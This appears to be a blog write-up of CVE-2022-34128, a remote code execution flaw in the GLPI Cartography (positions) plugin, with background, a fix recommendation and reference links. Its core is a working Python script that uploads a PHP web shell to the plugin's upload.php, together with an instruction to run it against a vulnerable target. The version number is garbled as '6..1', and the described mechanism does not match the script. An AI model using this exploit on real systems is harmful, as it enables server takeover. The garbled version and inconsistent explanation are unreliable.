CVE-2022-34128: Remote Code Execution Vulnerability in Cartography (aka positions) Plugin for GLPI

Overview

In this post, we will delve into a recently discovered security vulnerability called CVE-2022-34128. This exploits a remote code execution flaw present in the Cartography plugin before the version 6..1 for GLPI. To provide an understanding of the issue, we will discuss the background of GLPI and the Cartography plugin, explain how the vulnerability occurs, and provide code snippets that demonstrate the exploit. We will also link the original references for further detail and knowledge expansion.

GLPI and Cartography Plugin

GLPI, an acronym for Gestionnaire Libre de Parc Informatique, is a popular open-source Information Resource Manager (IRM) application designed to manage and track IT assets and inventory. The software is widely used by system administrators, IT managers, and helpdesk personnel for effective assistance in various IT operations and asset management tasks.

The Cartography (aka positions) plugin is an extension for GLPI that enables users to graphically represent and manage the geographical position of their IT assets and network devices on a virtual map. This provides users with a convenient way to visualize the distribution of their resources on a physical scale.

The Vulnerability: CVE-2022-34128

The vulnerability lies in the Cartography plugin located in the front/upload.php file. Specifically, the plugin allows remote code execution by allowing an attacker to send PHP code through the POST data in an HTTP request to this file. Upon processing this request, the server will execute the attacker's code. This level of access gives the attacker control over the target system and puts the entire GLPI implementation at risk.

To exploit this vulnerability, an attacker could craft a malicious HTTP request to front/upload.php containing PHP code within the POST data. The server, upon receiving this request, would execute the PHP code, thereby leading to a remote code execution attack.

Here's a sample exploit code that demonstrates this vulnerability

#!/usr/bin/env python3

import requests

target_url = "http://target-glpi.example.com/plugins/positions/front/upload.php";
malicious_file = "<?php system($_GET['cmd']); ?>"
files = {'file': ('malicious.php', malicious_file, 'application/x-php')}

response = requests.post(target_url, files=files)

if response.status_code == 200:
    print(f"File uploaded: {response.text}")
else:
    print("File upload failed")

Save this Python script as cve-2022-34128_exploit.py and run it against a vulnerable target system.

In the above Python code, we use the requests library to send an HTTP request to the target system's front/upload.php file. The POST data contains a malicious PHP file with a simple system() function that executes a command provided in the cmd GET parameter. On successful execution, the response from the server will confirm the file's upload.

For more information on this CVE and in-depth analysis, you may refer to the following resources

- CVE-2022-34128 entry in the National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-34128
- Commit in the Cartography plugin repository that patches the vulnerability: https://github.com/InfotelGLPI/positions/commit/6caafb72a3bcac95831e1958dabd2d4ec493df5

Conclusion

CVE-2022-34128 is a severe security vulnerability that allows remote code execution via the Cartography plugin for GLPI. To mitigate this issue, we highly recommend upgrading the plugin to version 6..1 or later. Ensuring that your systems are up-to-date with the latest security patches and updates is essential to maintaining the security and integrity of your IT assets. In case of any further questions, feel free to refer to the provided links.

Timeline

Published on: 04/16/2023 03:15:00 UTC
Last modified on: 04/25/2023 18:21:00 UTC